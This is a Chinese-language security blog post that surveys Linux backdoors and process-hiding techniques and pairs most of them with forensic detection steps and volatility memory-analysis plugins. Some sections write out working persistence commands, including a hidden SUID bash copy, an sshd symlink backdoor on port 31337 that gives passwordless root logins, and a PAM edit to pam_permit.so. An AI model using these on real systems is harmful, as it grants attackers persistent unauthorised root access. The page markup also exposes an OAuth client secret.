<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Linux,取证,">










<meta name="description" content="后续完成Linux 高级隐藏木马实现及检测方式 偷梁换柱型1）隐藏原理    通过替换系统中常见的进程查看工具（比如ps、top、lsof）的二进制程序，导致原先查看进程相关信息的工具（ps、top、lsof等）都被调包了，当然看不到2）防护手段    ​ I、从干净的系统上拷贝这些工具的备份至当前系统，对比前后的输出是否一致，不一致，则说明被替换了    ​ II、检测这些工具的hash值是否与">
<meta name="keywords" content="Linux,取证">
<meta property="og:type" content="article">
<meta property="og:title" content="总结一些Linux后门及取证方法">
<meta property="og:url" content="http://lahonja.site/2019/08/07/总结一些Linux后门及取证方法/index.html">
<meta property="og:site_name" content="记录和分享网络安全知识">
<meta property="og:description" content="后续完成Linux 高级隐藏木马实现及检测方式 偷梁换柱型1）隐藏原理    通过替换系统中常见的进程查看工具（比如ps、top、lsof）的二进制程序，导致原先查看进程相关信息的工具（ps、top、lsof等）都被调包了，当然看不到2）防护手段    ​ I、从干净的系统上拷贝这些工具的备份至当前系统，对比前后的输出是否一致，不一致，则说明被替换了    ​ II、检测这些工具的hash值是否与">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-08-08T05:05:59.110Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="总结一些Linux后门及取证方法">
<meta name="twitter:description" content="后续完成Linux 高级隐藏木马实现及检测方式 偷梁换柱型1）隐藏原理    通过替换系统中常见的进程查看工具（比如ps、top、lsof）的二进制程序，导致原先查看进程相关信息的工具（ps、top、lsof等）都被调包了，当然看不到2）防护手段    ​ I、从干净的系统上拷贝这些工具的备份至当前系统，对比前后的输出是否一致，不一致，则说明被替换了    ​ II、检测这些工具的hash值是否与">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://lahonja.site/2019/08/07/总结一些Linux后门及取证方法/">





  <title>总结一些Linux后门及取证方法 | 记录和分享网络安全知识</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">记录和分享网络安全知识</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lahonja's Blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://lahonja.site/2019/08/07/总结一些Linux后门及取证方法/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="LAHONJA">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="记录和分享网络安全知识">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">总结一些Linux后门及取证方法</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-08-07T10:55:04+08:00">
                2019-08-07
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/内网渗透/" itemprop="url" rel="index">
                    <span itemprop="name">内网渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/08/07/总结一些Linux后门及取证方法/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2019/08/07/总结一些Linux后门及取证方法/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.9k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="后续完成"><a href="#后续完成" class="headerlink" title="后续完成"></a>后续完成</h2><p>Linux 高级隐藏木马实现及检测方式</p>
<p>偷梁换柱型<br>1）隐藏原理<br>    通过替换系统中常见的进程查看工具（比如ps、top、lsof）的二进制程序，导致原先查看进程相关信息的工具（ps、top、lsof等）都被调包了，当然看不到<br>2）防护手段<br>    ​ I、从干净的系统上拷贝这些工具的备份至当前系统，对比前后的输出是否一致，不一致，则说明被替换了<br>    ​ II、检测这些工具的hash值是否与系统初始化的时候值不一致，是，则说明被替换了</p>
<a id="more"></a>
<p>HOOK<br>1）隐藏原理<br>    /proc是一个虚拟文件系统，是VFS的一个实现形式，/proc中包含了内核信息，硬件信息，进程信息等<br>    ps等工具就是通过分析/proc文件系统中进程相关目录的信息获取进程信息汇总<br>    ps 首先会调用openat 系统函数获取/proc目录的文件句柄，然后调用系统函数 getdents 递归获取/proc目录下所有文件信息（包括子目录），<br>    然后开始open函数打开/proc/进程pid/stat,/proc/进程pid/status, /proc/进程pid/cmdline 文件开始获取进程信息，然后打印给你看<br>    攻击者通过劫持getdents 等系统调用函数或libc中的readdir 函数，实现对特定进程名进程的隐藏，以达到进程隐藏目的<br>    方法：<br>        I、修改内核调用，比如getdents 的源码<br>        II、修改libc库中readdir 函数的源码<br>        III、利用环境变量LD_PRELOAD 或者配置ld.so.preload文件 以使的恶意的动态库先于系统标准库加载，以达到架空系统标准库中相关函数的目的，最终实现对特定进程的隐藏<br>    这3个原理类似，III相对于I、II比较简单，在此以III为例进行演示（劫持libc 中的readdir函数）<br>2）防护手段<br>    I、检查LD_PRELOAD环境变量是否有异常  echo $LD_PRELOAD<br>    II、检查ld.so.preload 等配置文件是否有异常<br>    III、自己写个python小工具，直接读取/proc中的内容，对于ps等工具的结果，对不上，则存在被劫持可能<br>    IV、使用sysdig（有开源版，可以监控ps等的调用过程，观察是否有恶意动态库被加载。strace有类似功能）或者 prochunter<br><a href="https://www.freebuf.com/articles/system/185942.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/185942.html</a></p>
<p>挂载覆盖型<br>1）隐藏原理<br>    利用mount –bind 将另外一个目录挂载覆盖至/proc/目录下指定进程ID的目录，我们知道ps、top等工具会读取/proc目录下获取进程信息，如果将进程ID的目录信息覆盖，则原来的进程信息将从ps的输出结果中隐匿。<br>    比如进程id为42的进程信息：mount –bind /empty/dir /proc/42<br>    案例：<a href="http://www.freebuf.com/articles/network/140535.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/network/140535.html</a><br>2）防护手段<br>    cat /proc/pid/mountinfo 或者cat /proc/mounts 查看是否有利用mount –bind 将其他目录或文件挂载至/proc下的进程目录的，umount /proc/pid 取消挂载</p>
<p>基于对内核空间修改进行进程信息隐藏的手法<br>    1、劫持VFS文件系统系列函数实现对/proc动态生成结果的干扰，从而实现对某些进程的隐藏。<br>        /proc这个内存文件系统是VFS的一个实现，如果在VFS接口层就进行进程过滤的话，我们在/proc目录下根本找不到相关进程的目录信息，更别谈ps 之类工具可以获取了。<br>        VFS层中涉及到proc动态生成结果的有inode_operation 和 file_operations等系列函数集，通过劫持这些函数集，可以使得进程信息无法通过文件系统接口输出给proc<br>    2、劫持进程创建模块代码，根据条件设置选择是否隐藏进程<br>        案例：  <a href="https://www.cnblogs.com/wacc/p/3674074.html" target="_blank" rel="noopener">https://www.cnblogs.com/wacc/p/3674074.html</a><br>                    <a href="https://www.cnblogs.com/wacc/p/3674097.html" target="_blank" rel="noopener">https://www.cnblogs.com/wacc/p/3674097.html</a><br>                    <a href="https://www.cnblogs.com/wacc/p/3674102.html" target="_blank" rel="noopener">https://www.cnblogs.com/wacc/p/3674102.html</a><br>        大致的意思就是在Linux进程管理之task_struct结构体增加进程隐藏与否标记<br>        进程创建代码模块中根据设置的进程隐藏比较选择是否隐藏进程，如果为隐藏标记，则删除/proc文件系统中该进程的相关目录项，直接在内核中就把指定进程给过滤了，用户态根本查不到</p>
<p>内存取证<br>hash-indentifier    检查hash类型<br>file                检查文件类型<br>binwalk -v xx.dump  检查可解析的文件<br>foremost            自动分割可检测到的文件</p>
<p><a href="http://jxnu.hetianlab.com/html/news/news-2017082601.html" target="_blank" rel="noopener">http://jxnu.hetianlab.com/html/news/news-2017082601.html</a><br><a href="https://cloud.tencent.com/developer/article/1039895" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1039895</a></p>
<p>volatility imageinfo -f xx.raw<br>volatility notepad -f xx.raw –profile=WinXPSP2x86</p>
<p>插件名    作用<br>imageinfo    识别内存映像相关信息（包括了配置文件类型、处理器数量、文件类型、文件日期与时间等等）<br>netscan    扫描内存中的连接以及开放端口<br>hivelist    列出注册表配置文件中的注册表信息<br>printkey    打印注册表项及其子项和对应的值<br>clipboard    打印内存中Windows剪切板中的内容<br>pslist    按照EPROCESS列表列出所有正在运行的进程<br>psscan    扫描内存中的进程<br>pstree    将内存中的进程以树的结构打印出来<br>dlllist    列出每个进程已加载的DLL<br>iehistory    重建Internet Explorer缓存/历史记录<br>filescan    扫描内存中的文件对象<br>cmdscan    通过扫描_COMMAND_HISTORY提取命令历史记录<br>cmdline    显示进程命令行参数<br>notepad    列出当前显示的记事本文本<br>hashdump    从内存中转储指定的密码hash<br>memdump    转储出可寻址的内存数据<br>hivedump    打印内存中指定的注册表信息<br>dumpfiles    提取内存映射以及缓存文件<br>procdump    将进程转储到可执行文件中</p>
<p>文件恢复<br>误删除文件进程还在的情况:<br>这种一般是有活动的进程存在持续标准输入或输出，到时文件被删除后，进程PID依旧存在。这也是有些服务器删除一些文件但是磁盘不释放的原因。<br>lsof | grep deletefile.txt<br>cp /proc/pid/fd/1 restore.txt<br>误删除的文件进程已经不存在，借助于工具还原:<br>extundelete<br>formost<br>停止对当前分区做任何操作，防止inode被覆盖<br>停止所在分区的服务，卸载目录所在的设备<br>通过dd命令对 当前分区进行备份</p>
<p>内网高隐藏攻击<br>流量上没有攻击行为的各种劫持：<br>    MIMT6 TCP/IP V6 劫持<br>    Responder LLMNR/WPAD 劫持<br>    ARP投毒<br>    DNS劫持<br>检测方法： 外部流量/内部日志</p>
<p>DNS劫持<br>/etc/hosts &lt;=&gt; C:\Windows\System32\drivers\etc\hosts<br>路由器主动抢包</p>
<p>PAM后门<br>Linux-PAM是可插入认证模块(Pluggable Authentication Modules)，PAM使用配置/etc/pam.d/下的文件，来管理对程序的认证方式。<br><a href="https://gorgias.me/2018/03/25/Linux-%E5%90%8E%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0-PAM%E5%90%8E%E9%97%A8/" target="_blank" rel="noopener">https://gorgias.me/2018/03/25/Linux-%E5%90%8E%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0-PAM%E5%90%8E%E9%97%A8/</a><br>可以对sshd, sudo, su, passwd等服务加入后门模块，当然后者属于低权限用户，可以使用trace跟踪输入的密码<br>/etc/pam.d/login<br>/etc/pam.d/sshd<br>配置文件中加入 auth       required     pam_auth_backdoor.so<br>认证模块允许使用多个认证方式顺序认证，当第一个认证不成功时可以继续使用之后的模块进行认证（也可配置为直接返回）。<br>required 表示本模块必须返回成功才能通过认证，但是如果该模块返回失败的话，失败结果也不会立即通知用户，而是要等所有模块执行完毕再将失败结果返回给应用程序。<br>requisite 与required类似，该模块必须返回成功才能通过认证，但是一旦该模块返回失败，将不再执行同一stack内的任何模块，而是直接将控制权返回给应用程序。<br>sufficient 表明本模块返回成功已经足以通过身份认证的要求，不必再执行其它模块，但是如果本模块返回失败的话可以忽略。<br>optional表明本模块是可选的，它的成功与否一般不会对身份认证起关键作用，其返回值一般被忽略。 </p>
<p>PAM配置文件后门<br><a href="https://www.freebuf.com/articles/system/138331.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/138331.html</a><br><a href="https://wooyun.js.org/drops/Linux%20PAM&amp;&amp;PAM%E5%90%8E%E9%97%A8.html" target="_blank" rel="noopener">https://wooyun.js.org/drops/Linux%20PAM&amp;&amp;PAM%E5%90%8E%E9%97%A8.html</a><br>/etc/pam.d/sshd =&gt; common-auth<br>auth    requisite            pam_deոy.so<br>改为<br>auth    requisite            pam_permit.so<br>pam_permit.so 不会对用户名及密码进行校验，始终允许访问。</p>
<p>loadable kernel module rootkit(LKM rootkit)。<br>LKM（可加载内核模块）<br>LKM的全称为Loadable Kernel Modules，中文名为可加载内核模块，主要作用是用来扩展linux的内核功能。<br>LKM的优点在于可以动态地加载到内存中，无须重新编译内核。由于LKM具有这样的特点，所以它经常被用于一些设备的驱动程序，例如声卡，网卡等等。<br>检测方法：<br>    lsmod</p>
<p>SUID后门<br>让本来没有相应权限的用户运行这个程序时，以进程文件所有者身份访问他没有权限访问的资源<br>    cp /bin/bash /.wootdawg<br>    chmod 4755 /.wootdawg<br>    chmod u+s /.wootdawg<br>    /.wootdawg -p</p>
<p>Crontab后门<br>增加超级用户帐号<br>ssh 公钥免密</p>
<p>SSH后门<br>    ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337<br>    执行完之后，任何一台机器ssh root@IP -p 31337不需要密码</p>
<p>DNS隧道：<br>DNS TXT记录一般用来记录某个主机名或者域名设置的说明，在这里可以填写任何东西，长度限制255。绝大多数的TXT记录是用来做SPF记录（反垃圾邮件）<br>服务端发送数据通过查询不一样的子域名（数据编码在子域名中）传输，服务端接收数据通过TXT记录最快（一次255字节）。<br>    1. 真实存在的域名，不需要指定DNS服务器，通过更新DNS解析实现。所有字段都可以，只是传递数据的快慢。<br>            中继过程中的一个关键点是对DNS缓存机制的规避，因为如果需要解析的域名在Local DNS Server中已经有缓存时，Local DNS Server就不会转发数据包。<br>            所以在我们构造的请求中，每次查询的域名都是不一样的或者是已经是过期的。<br>            正式使用时，需要购买一个域名。并在服务商控制台配置该域名将NS转由iodined服务端（DNS隧道服务端）去解析！<br>    2. 将DNS请求发往指定的虚假DNS服务器（DNS隧道服务端），可以请求解析任意域名。<br>检查方式：<br>    请求频率、数据长度<br><a href="https://www.cynet.com/blog/how-do-hackers-use-dns-tunneling-to-own-your-network/" target="_blank" rel="noopener">https://www.cynet.com/blog/how-do-hackers-use-dns-tunneling-to-own-your-network/</a><br><a href="https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" target="_blank" rel="noopener">https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/</a><br>iodine支持直接转发和中继两种模式。客户端和服务端建立通信后，可以看到客户机上多出一块名为dns0的虚拟网卡。<br>iodine支持NULL,TXT,SRV,MX,CNAME,A等多种查询请求类型,并且支持EDNS,支持base32，base64，base128等多种编码规范。<br>iodine在直连模式下，速度相当可观，我试过建立隧道后，用ssh做代理转发，可以流畅播放youtube 1080p，原理暂未分析。<br>在中继模式下，使用谷歌的dns，也是Dns Tunneling工具中速度最快的。</p>
<p>权限维持：<br><a href="https://www.hcblog.xyz/post-108.html" target="_blank" rel="noopener">https://www.hcblog.xyz/post-108.html</a></p>
<p>恶意流量：<br><a href="https://www.malware-traffic-analysis.net/2019/index.html" target="_blank" rel="noopener">https://www.malware-traffic-analysis.net/2019/index.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Linux/" rel="tag"># Linux</a>
          
            <a href="/tags/取证/" rel="tag"># 取证</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/07/结合CVE-2019-1040分析NTLM中继攻击/" rel="next" title="结合CVE-2019-1040分析NTLM中继攻击">
                <i class="fa fa-chevron-left"></i> 结合CVE-2019-1040分析NTLM中继攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/07/金融支付系统中存在的风险总结/" rel="prev" title="金融支付系统中存在的风险总结">
                金融支付系统中存在的风险总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">LAHONJA</p>
              <p class="site-description motion-element" itemprop="description">网络安全 CTF 内网渗透 取证分析</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            
            <br>
            <br>
            <div class="site-state-item site-state-posts" style="border-left:none;">
                  <span class="site-state-item-count" id="busuanzi_value_site_pv"></span>
                  <span class="site-state-item-name">浏览量</span>
            </div>
            <div class="site-state-item site-state-posts">
                  <span class="site-state-item-count" id="busuanzi_value_site_uv"></span>
                <span class="site-state-item-name">访客量</span>
            </div>
            <div class="site-state-item site-state-posts">
                  <span class="site-state-item-count">15.9k</span>
                  <span class="site-state-item-name">总字数</span>
            </div>
          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#后续完成"><span class="nav-number">1.</span> <span class="nav-text">后续完成</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LAHONJA</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    
      <style>
        a.gitment-editor-footer-tip { display: none; }
        .gitment-container.gitment-footer-container { display: none; }
      </style>
    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1565146504000', 
            owner: 'lahonja',
            repo: 'lahonja-gitment',
            
            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: 'da95862b3f011a7014c03ca9390abcaaf69fd37b',
            
                client_id: 'be29a1cd496db3f72d7b'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  

  

  
  

  

  

  

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>
